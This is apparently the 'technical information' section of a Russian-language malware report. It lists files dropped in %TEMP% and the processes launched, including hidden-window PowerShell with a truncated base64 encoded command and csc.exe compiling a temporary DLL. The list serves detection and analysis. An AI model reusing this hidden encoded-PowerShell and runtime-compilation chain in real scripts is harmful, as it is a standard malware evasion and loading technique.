Техническая информация
- %TEMP%\content\3392-4484-wscript.exe-03-07-48-043.dump
- %TEMP%\v5jktelb\v5jktelb.0.cs
- %TEMP%\v5jktelb\v5jktelb.cmdline
- %TEMP%\v5jktelb\v5jktelb.out
- %TEMP%\v5jktelb\csc837dd07c6e6f4df8a4dcbf0d454885f.tmp
- %TEMP%\res4595.tmp
- %TEMP%\v5jktelb\v5jktelb.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBzAGEAbgBkAGEAbABlAG4AcwAgAEQAcgB1AG4AdABlAGMANgAgAGIAdQByAGcAdQBuAGQAZQBnAGUAIABzAHAAcgBuAGcAbgBpACAARQBMAEkATQBJAE4AQQAgAFIAZQBnAGUAbABsAHMAIABLAE8ATQBQAEEARwBOAE8AIABLAG8A...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\v5jktelb\v5jktelb.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4595.tmp" "%TEMP%\v5jktelb\CSC837DD07C6E6F4DF8A4DCBF0D454885F.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBzAGEAbgBkAGEAbABlAG4AcwAgAEQAcgB1AG4AdABlAGMANgAgAGIAdQByAGcAdQBuAGQAZQBnAGUAIABzAHAAcgBuAGcAbgBpACAARQBMAEkATQBJAE4AQQAgAFIAZQBnAGUAbABsAHMAIABLAE8ATQBQAEEARwBOAE8AIABLAG8A...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\v5jktelb\v5jktelb.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4595.tmp" "%TEMP%\v5jktelb\CSC837DD07C6E6F4DF8A4DCBF0D454885F.TMP"